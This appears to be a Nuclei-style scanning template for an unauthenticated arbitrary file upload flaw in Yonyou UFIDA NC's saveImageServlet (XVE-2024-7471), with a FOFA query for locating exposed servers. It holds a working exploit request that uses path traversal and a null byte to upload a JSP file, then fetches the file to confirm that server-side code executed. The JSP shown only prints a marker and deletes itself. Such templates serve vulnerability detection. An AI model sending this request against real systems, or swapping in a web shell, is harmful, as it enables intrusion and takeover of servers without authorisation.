http:
    - raw:
        - |
          POST /portal/pt/servlet/saveImageServlet/doPost?pageId=login&filename=../{{username}}.jsp%00 HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
          Content-Type: application/octet-stream

          <% out.println("pboyjnnrfipmplsukdeczudsefxmywe"); new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
    - matchers:
        - part: body
          type: word
          words:
            - pboyjnnrfipmplsukdeczudsefxmywe
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /portal/processxml/{{username}}.jsp HTTP/1.1
          Host: {{Hostname}}
id: yongyouNC-saveImageServlet-File-upload-XVE-2024-7471
info:
    author: Superhero
    description: |-
        fofa: app="用友-UFIDA-NC"
        用友NC saveImageServlet接口处存在任意文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: 用友NC saveImageServlet 任意文件上传漏洞(XVE-2024-7471)
    reference:
        - https://mp.weixin.qq.com/s/2oDpPxeoDIG0WwK3FsBKZg
    severity: high
    tags:
        - 用友-ufida
        - Oce
        - Eserv
        - Servlet
        - eserv
variables:
    username: '{{to_lower(rand_base(6))}}'
